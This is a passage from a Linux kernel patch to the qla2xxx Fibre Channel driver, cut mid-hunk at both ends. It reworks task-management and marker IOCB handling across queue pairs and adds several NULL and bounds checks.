++	vha = fcport->vha;
+ 
+ 	if (unlikely(pci_channel_offline(fcport->vha->hw->pdev))) {
+ 		qla2x00_abort_all_cmds(fcport->vha, DID_NO_CONNECT << 16);
++		qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24,
++			0, WAIT_TARGET);
+ 		return;
+ 	}
+ 	/*
+@@ -2786,6 +2790,15 @@ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ 			qla2x00_port_logout(fcport->vha, fcport);
+ 		}
+ 	}
++
++	/* check for any straggling io left behind */
++	if (qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24, 0, WAIT_TARGET)) {
++		ql_log(ql_log_warn, vha, 0x300b,
++		       "IO not return.  Resetting. \n");
++		set_bit(ISP_ABORT_NEEDED, &vha->dpc_flags);
++		qla2xxx_wake_dpc(vha);
++		qla2x00_wait_for_chip_reset(vha);
++	}
+ }
+ 
+ static int
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index dba7bba788d76..19bb64bdd88b1 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -283,6 +283,10 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
++		if (!rport) {
++			rval = -ENOMEM;
++			goto done;
++		}
+ 		fcport = *(fc_port_t **) rport->dd_data;
+ 		host = rport_to_shost(rport);
+ 		vha = shost_priv(host);
+@@ -2992,6 +2996,8 @@ qla24xx_bsg_request(struct bsg_job *bsg_job)
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
++		if (!rport)
++			return ret;
+ 		host = rport_to_shost(rport);
+ 		vha = shost_priv(host);
+ 	} else {
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index cd4eb11b07079..5a2f629d18e69 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -457,6 +457,15 @@ static inline be_id_t port_id_to_be_id(port_id_t port_id)
+ 	return res;
+ }
+ 
++struct tmf_arg {
++	struct qla_qpair *qpair;
++	struct fc_port *fcport;
++	struct scsi_qla_host *vha;
++	u64 lun;
++	u32 flags;
++	uint8_t modifier;
++};
++
+ struct els_logo_payload {
+ 	uint8_t opcode;
+ 	uint8_t rsvd[3];
+@@ -536,6 +545,10 @@ struct srb_iocb {
+ 			uint32_t data;
+ 			struct completion comp;
+ 			__le16 comp_status;
++
++			uint8_t modifier;
++			uint8_t vp_index;
++			uint16_t loop_id;
+ 		} tmf;
+ 		struct {
+ #define SRB_FXDISC_REQ_DMA_VALID	BIT_0
+@@ -639,6 +652,7 @@ struct srb_iocb {
+ #define SRB_SA_UPDATE	25
+ #define SRB_ELS_CMD_HST_NOLOGIN 26
+ #define SRB_SA_REPLACE	27
++#define SRB_MARKER	28
+ 
+ struct qla_els_pt_arg {
+ 	u8 els_opcode;
+@@ -681,7 +695,6 @@ typedef struct srb {
+ 	struct iocb_resource iores;
+ 	struct kref cmd_kref;	/* need to migrate ref_count over to this */
+ 	void *priv;
+-	wait_queue_head_t nvme_ls_waitq;
+ 	struct fc_port *fcport;
+ 	struct scsi_qla_host *vha;
+ 	unsigned int start_timer:1;
+@@ -2521,6 +2534,7 @@ enum rscn_addr_format {
+ typedef struct fc_port {
+ 	struct list_head list;
+ 	struct scsi_qla_host *vha;
++	struct list_head tmf_pending;
+ 
+ 	unsigned int conf_compl_supported:1;
+ 	unsigned int deleted:2;
+@@ -2541,6 +2555,8 @@ typedef struct fc_port {
+ 	unsigned int do_prli_nvme:1;
+ 
+ 	uint8_t nvme_flag;
++	uint8_t active_tmf;
++#define MAX_ACTIVE_TMF 8
+ 
+ 	uint8_t node_name[WWN_SIZE];
+ 	uint8_t port_name[WWN_SIZE];
+@@ -5482,4 +5498,8 @@ struct ql_vnd_tgt_stats_resp {
+ 	_fp->disc_state, _fp->scan_state, _fp->loop_id, _fp->deleted, \
+ 	_fp->flags
+ 
++#define TMF_NOT_READY(_fcport) \
++	(!_fcport || IS_SESSION_DELETED(_fcport) || atomic_read(&_fcport->state) != FCS_ONLINE || \
++	!_fcport->vha->hw->flags.fw_started)
++
+ #endif
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index 1cafd27d5a609..7aee4d093969a 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -2319,8 +2319,8 @@ qla24xx_issue_sa_replace_iocb(scsi_qla_host_t *vha, struct qla_work_evt *e)
+ 	if (!sa_ctl) {
+ 		ql_dbg(ql_dbg_edif, vha, 0x70e6,
+ 		    "sa_ctl allocation failed\n");
+-		rval =  -ENOMEM;
+-		goto done;
++		rval = -ENOMEM;
++		return rval;
+ 	}
+ 
+ 	fcport = sa_ctl->fcport;
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index ee54207fc5319..316122709b0e6 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -69,7 +69,7 @@ extern int qla2x00_async_logout(struct scsi_qla_host *, fc_port_t *);
+ extern int qla2x00_async_prlo(struct scsi_qla_host *, fc_port_t *);
+ extern int qla2x00_async_adisc(struct scsi_qla_host *, fc_port_t *,
+     uint16_t *);
+-extern int qla2x00_async_tm_cmd(fc_port_t *, uint32_t, uint32_t, uint32_t);
++extern int qla2x00_async_tm_cmd(fc_port_t *, uint32_t, uint64_t, uint32_t);
+ struct qla_work_evt *qla2x00_alloc_work(struct scsi_qla_host *,
+     enum qla_work_type);
+ extern int qla24xx_async_gnl(struct scsi_qla_host *, fc_port_t *);
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 93f7f3dd5d82b..b597c782b95ee 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1997,6 +1997,11 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 	int rc, h;
+ 	unsigned long flags;
+ 
++	if (sp->type == SRB_MARKER) {
++		complete(&tmf->u.tmf.comp);
++		return;
++	}
++
+ 	rc = qla24xx_async_abort_cmd(sp, false);
+ 	if (rc) {
+ 		spin_lock_irqsave(sp->qpair->qp_lock_ptr, flags);
+@@ -2014,24 +2019,131 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 	}
+ }
+ 
++static void qla_marker_sp_done(srb_t *sp, int res)
++{
++	struct srb_iocb *tmf = &sp->u.iocb_cmd;
++
++	if (res != QLA_SUCCESS)
++		ql_dbg(ql_dbg_taskm, sp->vha, 0x8004,
++		    "Async-marker fail hdl=%x portid=%06x ctrl=%x lun=%lld qp=%d.\n",
++		    sp->handle, sp->fcport->d_id.b24, sp->u.iocb_cmd.u.tmf.flags,
++		    sp->u.iocb_cmd.u.tmf.lun, sp->qpair->id);
++
++	sp->u.iocb_cmd.u.tmf.data = res;
++	complete(&tmf->u.tmf.comp);
++}
++
++#define  START_SP_W_RETRIES(_sp, _rval) \
++{\
++	int cnt = 5; \
++	do { \
++		_rval = qla2x00_start_sp(_sp); \
++		if (_rval == EAGAIN) \
++			msleep(1); \
++		else \
++			break; \
++		cnt--; \
++	} while (cnt); \
++}
++
++/**
++ * qla26xx_marker: send a marker IOCB and wait for its completion.
++ * @arg: pointer to argument list.
++ *    It is assumed the caller will provide an fcport pointer and modifier.
++ */
++static int
++qla26xx_marker(struct tmf_arg *arg)
++{
++	struct scsi_qla_host *vha = arg->vha;
++	struct srb_iocb *tm_iocb;
++	srb_t *sp;
++	int rval = QLA_FUNCTION_FAILED;
++	fc_port_t *fcport = arg->fcport;
++
++	if (TMF_NOT_READY(arg->fcport)) {
++		ql_dbg(ql_dbg_taskm, vha, 0x8039,
++		    "FC port not ready for marker loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d.\n",
++		    fcport->loop_id, fcport->d_id.b24,
++		    arg->modifier, arg->lun, arg->qpair->id);
++		return QLA_SUSPENDED;
++	}
++
++	/* ref: INIT */
++	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
++	if (!sp)
++		goto done;
++
++	sp->type = SRB_MARKER;
++	sp->name = "marker";
++	qla2x00_init_async_sp(sp, qla2x00_get_async_timeout(vha), qla_marker_sp_done);
++	sp->u.iocb_cmd.timeout = qla2x00_tmf_iocb_timeout;
++
++	tm_iocb = &sp->u.iocb_cmd;
++	init_completion(&tm_iocb->u.tmf.comp);
++	tm_iocb->u.tmf.modifier = arg->modifier;
++	tm_iocb->u.tmf.lun = arg->lun;
++	tm_iocb->u.tmf.loop_id = fcport->loop_id;
++	tm_iocb->u.tmf.vp_index = vha->vp_idx;
++
++	START_SP_W_RETRIES(sp, rval);
++
++	ql_dbg(ql_dbg_taskm, vha, 0x8006,
++	    "Async-marker hdl=%x loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d rval %d.\n",
++	    sp->handle, fcport->loop_id, fcport->d_id.b24,
++	    arg->modifier, arg->lun, sp->qpair->id, rval);
++
++	if (rval != QLA_SUCCESS) {
++		ql_log(ql_log_warn, vha, 0x8031,
++		    "Marker IOCB send failure (%x).\n", rval);
++		goto done_free_sp;
++	}
++
++	wait_for_completion(&tm_iocb->u.tmf.comp);
++	rval = tm_iocb->u.tmf.data;
++
++	if (rval != QLA_SUCCESS) {
++		ql_log(ql_log_warn, vha, 0x8019,
++		    "Marker failed hdl=%x loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d rval %d.\n",
++		    sp->handle, fcport->loop_id, fcport->d_id.b24,
++		    arg->modifier, arg->lun, sp->qpair->id, rval);
++	}
++
++done_free_sp:
++	/* ref: INIT */
++	kref_put(&sp->cmd_kref, qla2x00_sp_release);
++done:
++	return rval;
++}
++
+ static void qla2x00_tmf_sp_done(srb_t *sp, int res)
+ {
+ 	struct srb_iocb *tmf = &sp->u.iocb_cmd;
+ 
++	if (res)
++		tmf->u.tmf.data = res;
+ 	complete(&tmf->u.tmf.comp);
+ }
+ 
+-int
+-qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+-	uint32_t tag)
++static int
++__qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ {
+-	struct scsi_qla_host *vha = fcport->vha;
++	struct scsi_qla_host *vha = arg->vha;
+ 	struct srb_iocb *tm_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+ 
++	fc_port_t *fcport = arg->fcport;
++
++	if (TMF_NOT_READY(arg->fcport)) {
++		ql_dbg(ql_dbg_taskm, vha, 0x8032,
++		    "FC port not ready for TM command loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d.\n",
++		    fcport->loop_id, fcport->d_id.b24,
++		    arg->modifier, arg->lun, arg->qpair->id);
++		return QLA_SUSPENDED;
++	}
++
+ 	/* ref: INIT */
+-	sp = qla2x00_get_sp(vha, fcport, GFP_KERNEL);
++	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
+ 	if (!sp)
+ 		goto done;
+ 
+@@ -2044,15 +2156,16 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ 
+ 	tm_iocb = &sp->u.iocb_cmd;
+ 	init_completion(&tm_iocb->u.tmf.comp);
+-	tm_iocb->u.tmf.flags = flags;
+-	tm_iocb->u.tmf.lun = lun;
++	tm_iocb->u.tmf.flags = arg->flags;
++	tm_iocb->u.tmf.lun = arg->lun;
++
++	START_SP_W_RETRIES(sp, rval);
+ 
+ 	ql_dbg(ql_dbg_taskm, vha, 0x802f,
+-	    "Async-tmf hdl=%x loop-id=%x portid=%02x%02x%02x.\n",
+-	    sp->handle, fcport->loop_id, fcport->d_id.b.domain,
+-	    fcport->d_id.b.area, fcport->d_id.b.al_pa);
++	    "Async-tmf hdl=%x loop-id=%x portid=%06x ctrl=%x lun=%lld qp=%d rval=%x.\n",
++	    sp->handle, fcport->loop_id, fcport->d_id.b24,
++	    arg->flags, arg->lun, sp->qpair->id, rval);
+ 
+-	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS)
+ 		goto done_free_sp;
+ 	wait_for_completion(&tm_iocb->u.tmf.comp);
+@@ -2064,15 +2177,8 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ 		    "TM IOCB failed (%x).\n", rval);
+ 	}
+ 
+-	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw)) {
+-		flags = tm_iocb->u.tmf.flags;
+-		lun = (uint16_t)tm_iocb->u.tmf.lun;
+-
+-		/* Issue Marker IOCB */
+-		qla2x00_marker(vha, vha->hw->base_qpair,
+-		    fcport->loop_id, lun,
+-		    flags == TCF_LUN_RESET ? MK_SYNC_ID_LUN : MK_SYNC_ID);
+-	}
++	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw))
++		rval = qla26xx_marker(arg);
+ 
+ done_free_sp:
+ 	/* ref: INIT */
+@@ -2081,6 +2187,115 @@ done:
+ 	return rval;
+ }
+ 
++static void qla_put_tmf(fc_port_t *fcport)
++{
++	struct scsi_qla_host *vha = fcport->vha;
++	struct qla_hw_data *ha = vha->hw;
++	unsigned long flags;
++
++	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
++	fcport->active_tmf--;
++	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++}
++
++static
++int qla_get_tmf(fc_port_t *fcport)
++{
++	struct scsi_qla_host *vha = fcport->vha;
++	struct qla_hw_data *ha = vha->hw;
++	unsigned long flags;
++	int rc = 0;
++	LIST_HEAD(tmf_elem);
++
++	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
++	list_add_tail(&tmf_elem, &fcport->tmf_pending);
++
++	while (fcport->active_tmf >= MAX_ACTIVE_TMF) {
++		spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++
++		msleep(1);
++
++		spin_lock_irqsave(&ha->tgt.sess_lock, flags);
++		if (TMF_NOT_READY(fcport)) {
++			ql_log(ql_log_warn, vha, 0x802c,
++			    "Unable to acquire TM resource due to disruption.\n");
++			rc = EIO;
++			break;
++		}
++		if (fcport->active_tmf < MAX_ACTIVE_TMF &&
++		    list_is_first(&tmf_elem, &fcport->tmf_pending))
++			break;
++	}
++
++	list_del(&tmf_elem);
++
++	if (!rc)
++		fcport->active_tmf++;
++
++	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++
++	return rc;
++}
++
++int
++qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint64_t lun,
++		     uint32_t tag)
++{
++	struct scsi_qla_host *vha = fcport->vha;
++	struct qla_qpair *qpair;
++	struct tmf_arg a;
++	int i, rval = QLA_SUCCESS;
++
++	if (TMF_NOT_READY(fcport))
++		return QLA_SUSPENDED;
++
++	a.vha = fcport->vha;
++	a.fcport = fcport;
++	a.lun = lun;
++	if (flags & (TCF_LUN_RESET|TCF_ABORT_TASK_SET|TCF_CLEAR_TASK_SET|TCF_CLEAR_ACA)) {
++		a.modifier = MK_SYNC_ID_LUN;
++
++		if (qla_get_tmf(fcport))
++			return QLA_FUNCTION_FAILED;
++	} else {
++		a.modifier = MK_SYNC_ID;
++	}
++
++	if (vha->hw->mqenable) {
++		for (i = 0; i < vha->hw->num_qpairs; i++) {
++			qpair = vha->hw->queue_pair_map[i];
++			if (!qpair)
++				continue;
++
++			if (TMF_NOT_READY(fcport)) {
++				ql_log(ql_log_warn, vha, 0x8026,
++				    "Unable to send TM due to disruption.\n");
++				rval = QLA_SUSPENDED;
++				break;
++			}
++
++			a.qpair = qpair;
++			a.flags = flags|TCF_NOTMCMD_TO_TARGET;
++			rval = __qla2x00_async_tm_cmd(&a);
++			if (rval)
++				break;
++		}
++	}
++
++	if (rval)
++		goto bailout;
++
++	a.qpair = vha->hw->base_qpair;
++	a.flags = flags;
++	rval = __qla2x00_async_tm_cmd(&a);
++
++bailout:
++	if (a.modifier == MK_SYNC_ID_LUN)
++		qla_put_tmf(fcport);
++
++	return rval;
++}
++
+ int
+ qla24xx_async_abort_command(srb_t *sp)
+ {
+@@ -5313,6 +5528,7 @@ qla2x00_alloc_fcport(scsi_qla_host_t *vha, gfp_t flags)
+ 	INIT_WORK(&fcport->reg_work, qla_register_fcport_fn);
+ 	INIT_LIST_HEAD(&fcport->gnl_entry);
+ 	INIT_LIST_HEAD(&fcport->list);
++	INIT_LIST_HEAD(&fcport->tmf_pending);
+ 
+ 	INIT_LIST_HEAD(&fcport->sess_cmd_list);
+ 	spin_lock_init(&fcport->sess_cmd_lock);
+@@ -5355,7 +5571,7 @@ static void qla_get_login_template(scsi_qla_host_t *vha)
+ 	__be32 *q;
+ 
+ 	memset(ha->init_cb, 0, ha->init_cb_size);
+-	sz = min_t(int, sizeof(struct fc_els_flogi), ha->init_cb_size);
++	sz = min_t(int, sizeof(struct fc_els_csp), ha->init_cb_size);
+ 	rval = qla24xx_get_port_login_templ(vha, ha->init_cb_dma,
+ 					    ha->init_cb, sz);
+ 	if (rval != QLA_SUCCESS) {
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index b0ee307b5d4b9..a034699e58ae9 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -109,11 +109,13 @@ qla2x00_set_fcport_disc_state(fc_port_t *fcport, int state)
+ {
+ 	int old_val;
+ 	uint8_t shiftbits, mask;
++	uint8_t port_dstate_str_sz;
+ 
+ 	/* This will have to change when the max no. of states > 16 */
+ 	shiftbits = 4;
+ 	mask = (1 << shiftbits) - 1;
+ 
++	port_dstate_str_sz = sizeof(port_dstate_str) / sizeof(char *);
+ 	fcport->disc_state = state;
+ 	while (1) {
+ 		old_val = atomic_read(&fcport->shadow_disc_state);
+@@ -121,7 +123,8 @@ qla2x00_set_fcport_disc_state(fc_port_t *fcport, int state)
+ 		    old_val, (old_val << shiftbits) | state)) {
+ 			ql_dbg(ql_dbg_disc, fcport->vha, 0x2134,
+ 			    "FCPort %8phC disc_state transition: %s to %s - portid=%06x.\n",
+-			    fcport->port_name, port_dstate_str[old_val & mask],
++			    fcport->port_name, (old_val & mask) < port_dstate_str_sz ?
++				    port_dstate_str[old_val & mask] : "Unknown",
+ 			    port_dstate_str[state], fcport->d_id.b24);
+ 			return;
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 4f48f098ea5a6..c9a686f06d29d 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -522,21 +522,25 @@ __qla2x00_marker(struct scsi_qla_host *vha, struct qla_qpair *qpair,
+ 		return (QLA_FUNCTION_FAILED);
+ 	}
+ 
++	mrk24 = (struct mrk_entry_24xx *)mrk;
++
+ 	mrk->entry_type = MARKER_TYPE;
+ 	mrk->modifier = type;
+ 	if (type != MK_SYNC_ALL) {
+ 		if (IS_FWI2_CAPABLE(ha)) {
+-			mrk24 = (struct mrk_entry_24xx *) mrk;
+ 			mrk24->nport_handle = cpu_to_le16(loop_id);
+ 			int_to_scsilun(lun, (struct scsi_lun *)&mrk24->lun);
+ 			host_to_fcp_swap(mrk24->lun, sizeof(mrk24->lun));
+ 			mrk24->vp_index = vha->vp_idx;
+-			mrk24->handle = make_handle(req->id, mrk24->handle);
+ 		} else {
+ 			SET_TARGET_ID(ha, mrk->target, loop_id);
+ 			mrk->lun = cpu_to_le16((uint16_t)lun);
+ 		}
+ 	}
++
++	if (IS_FWI2_CAPABLE(ha))
++		mrk24->handle = QLA_SKIP_HANDLE;
++
+ 	wmb();
+ 
+ 	qla2x00_start_iocbs(vha, req);
+@@ -603,7 +607,8 @@ qla24xx_build_scsi_type_6_iocbs(srb_t *sp, struct cmd_type_6 *cmd_pkt,
+ 	put_unaligned_le32(COMMAND_TYPE_6, &cmd_pkt->entry_type);
+ 
+ 	/* No data transfer */
+-	if (!scsi_bufflen(cmd) || cmd->sc_data_direction == DMA_NONE) {
++	if (!scsi_bufflen(cmd) || cmd->sc_data_direction == DMA_NONE ||
++	    tot_dsds == 0) {
+ 		cmd_pkt->byte_count = cpu_to_le32(0);
+ 		return 0;
+ 	}
+@@ -2541,7 +2546,7 @@ qla24xx_tm_iocb(srb_t *sp, struct tsk_mgmt_entry *tsk)
+ 	scsi_qla_host_t *vha = fcport->vha;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	struct srb_iocb *iocb = &sp->u.iocb_cmd;
+-	struct req_que *req = vha->req;
++	struct req_que *req = sp->qpair->req;
+ 
+ 	flags = iocb->u.tmf.flags;
+ 	lun = iocb->u.tmf.lun;
+@@ -2557,7 +2562,8 @@ qla24xx_tm_iocb(srb_t *sp, struct tsk_mgmt_entry *tsk)
+ 	tsk->port_id[2] = fcport->d_id.b.domain;
+ 	tsk->vp_index = fcport->vha->vp_idx;
+ 
+-	if (flags == TCF_LUN_RESET) {
++	if (flags & (TCF_LUN_RESET | TCF_ABORT_TASK_SET|
++	    TCF_CLEAR_TASK_SET|TCF_CLEAR_ACA)) {
+ 		int_to_scsilun(lun, &tsk->lun);
+ 		host_to_fcp_swap((uint8_t *)&tsk->lun,
+ 			sizeof(tsk->lun));
+@@ -3858,9 +3864,9 @@ int qla_get_iocbs_resource(struct srb *sp)
+ 	case SRB_NACK_LOGO:
+ 	case SRB_LOGOUT_CMD:
+ 	case SRB_CTRL_VP:
+-		push_it_through = true;
+-		fallthrough;
++	case SRB_MARKER:
+ 	default:
++		push_it_through = true;
+ 		get_exch = false;
+ 	}
+ 
+@@ -3876,6 +3882,19 @@ int qla_get_iocbs_resource(struct srb *sp)
+ 	return qla_get_fw_resources(sp->qpair, &sp->iores);
+ }
+ 
++static void
++qla_marker_iocb(srb_t *sp, struct mrk_entry_24xx *mrk)
++{
++	mrk->entry_type = MARKER_TYPE;
++	mrk->modifier = sp->u.iocb_cmd.u.tmf.modifier;
++	if (sp->u.iocb_cmd.u.tmf.modifier != MK_SYNC_ALL) {
++		mrk->nport_handle = cpu_to_le16(sp->u.iocb_cmd.u.tmf.loop_id);
++		int_to_scsilun(sp->u.iocb_cmd.u.tmf.lun, (struct scsi_lun *)&mrk->lun);
++		host_to_fcp_swap(mrk->lun, sizeof(mrk->lun));
++		mrk->vp_index = sp->u.iocb_cmd.u.tmf.vp_index;
++	}
++}
++
+ int
+ qla2x00_start_sp(srb_t *sp)
+ {
+@@ -3898,7 +3917,7 @@ qla2x00_start_sp(srb_t *sp)
+ 
+ 	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
+ 	if (!pkt) {
+-		rval = EAGAIN;
++		rval = -EAGAIN;
+ 		ql_log(ql_log_warn, vha, 0x700c,
+ 		    "qla2x00_alloc_iocbs failed.\n");
+ 		goto done;
+@@ -3979,6 +3998,9 @@ qla2x00_start_sp(srb_t *sp)
+ 	case SRB_SA_REPLACE:
+ 		qla24xx_sa_replace_iocb(sp, pkt);
+ 		break;
++	case SRB_MARKER:
++		qla_marker_iocb(sp, pkt);
++		break;
+ 	default:
+ 		break;
+ 	}
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index 86928a762a7a6..b41d604ca9bc8 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1862,9 +1862,9 @@ qla2x00_process_completed_request(struct scsi_qla_host *vha,
+ 	}
+ }
+ 
+-srb_t *
+-qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+-    struct req_que *req, void *iocb)
++static srb_t *
++qla_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
++		       struct req_que *req, void *iocb, u16 *ret_index)
+ {
+ 	struct qla_hw_data *ha = vha->hw;
+ 	sts_entry_t *pkt = iocb;
+@@ -1899,12 +1899,25 @@ qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+ 		return NULL;
+ 	}
+ 
+-	req->outstanding_cmds[index] = NULL;
+-
++	*ret_index = index;
+ 	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	return sp;
+ }
+ 
++srb_t *
++qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
++			   struct req_que *req, void *iocb)
++{
++	uint16_t index;
++	srb_t *sp;
++
++	sp = qla_get_sp_from_handle(vha, func, req, iocb, &index);
++	if (sp)
++		req->outstanding_cmds[index] = NULL;
++
++	return sp;
++}
++
+ static void
+ qla2x00_mbx_iocb_entry(scsi_qla_host_t *vha, struct req_que *req,
+     struct mbx_entry *mbx)
+@@ -3237,13 +3250,13 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 		return;
+ 	}
+ 
+-	req->outstanding_cmds[handle] = NULL;
+ 	cp = GET_CMD_SP(sp);
+ 	if (cp == NULL) {
+ 		ql_dbg(ql_dbg_io, vha, 0x3018,
+ 		    "Command already returned (0x%x/%p).\n",
+ 		    sts->handle, sp);
+ 
++		req->outstanding_cmds[handle] = NULL;
+ 		return;
+ 	}
+ 
+@@ -3514,6 +3527,9 @@ out:
+ 
+ 	if (rsp->status_srb == NULL)
+ 		sp->done(sp, res);
++
++	/* For I/Os, clearing outstanding_cmds[handle] means scsi_done was called */
++	req->outstanding_cmds[handle] = NULL;
+ }
+ 
+ /**
+@@ -3590,6 +3606,7 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	uint16_t que = MSW(pkt->handle);
+ 	struct req_que *req = NULL;
+ 	int res = DID_ERROR << 16;
++	u16 index;
+ 
+ 	ql_dbg(ql_dbg_async, vha, 0x502a,
+ 	    "iocb type %xh with error status %xh, handle %xh, rspq id %d\n",
+@@ -3608,7 +3625,6 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 
+ 	switch (pkt->entry_type) {
+ 	case NOTIFY_ACK_TYPE:
+-	case STATUS_TYPE:
+ 	case STATUS_CONT_TYPE:
+ 	case LOGINOUT_PORT_IOCB_TYPE:
+ 	case CT_IOCB_TYPE:
+@@ -3628,6 +3644,14 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	case CTIO_TYPE7:
+ 	case CTIO_CRC2:
+ 		return 1;
++	case STATUS_TYPE:
++		sp = qla_get_sp_from_handle(vha, func, req, pkt, &index);
++		if (sp) {
++			sp->done(sp, res);
++			req->outstanding_cmds[index] = NULL;
++			return 0;
++		}
++		break;
+ 	}
+ fatal:
+ 	ql_log(ql_log_warn, vha, 0x5030,
+@@ -3750,6 +3774,28 @@ static int qla_chk_cont_iocb_avail(struct scsi_qla_host *vha,
+ 	return rc;
+ }
+ 
++static void qla_marker_iocb_entry(scsi_qla_host_t *vha, struct req_que *req,
++	struct mrk_entry_24xx *pkt)
++{
++	const char func[] = "MRK-IOCB";
++	srb_t *sp;
++	int res = QLA_SUCCESS;
++
++	if (!IS_FWI2_CAPABLE(vha->hw))
++		return;
++
++	sp = qla2x00_get_sp_from_handle(vha, func, req, pkt);
++	if (!sp)
++		return;
++
++	if (pkt->entry_status) {
++		ql_dbg(ql_dbg_taskm, vha, 0x8025, "marker failure.\n");
++		res = QLA_COMMAND_ERROR;
++	}
++	sp->u.iocb_cmd.u.tmf.data = res;
++	sp->done(sp, res);
++}
++
+ /**
+  * qla24xx_process_response_queue() - Process response queue entries.
+  * @vha: SCSI driver HA context
+@@ -3864,9 +3910,7 @@ process_err:
+ 					(struct nack_to_isp *)pkt);
+ 			break;
+ 		case MARKER_TYPE:
+-			/* Do nothing in this case, this check is to prevent it
+-			 * from falling into default case
+-			 */
++			qla_marker_iocb_entry(vha, rsp->req, (struct mrk_entry_24xx *)pkt);
+ 			break;
+ 		case ABORT_IOCB_TYPE:
+ 			qla24xx_abort_iocb_entry(vha, rsp->req,
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index c57e02a355219..57545d5e82b9d 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -360,7 +360,6 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x700e,
+ 		    "qla2x00_start_sp failed = %d\n", rval);
+-		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+ 		qla2x00_rel_sp(sp);
+@@ -648,7 +647,6 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	if (!sp)
+ 		return -EBUSY;
+ 
+-	init_waitqueue_head(&sp->nvme_ls_waitq);
+ 	kref_init(&sp->cmd_kref);
+ 	spin_lock_init(&priv->cmd_lock);
+ 	sp->priv = priv;
+@@ -667,7 +665,6 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x212d,
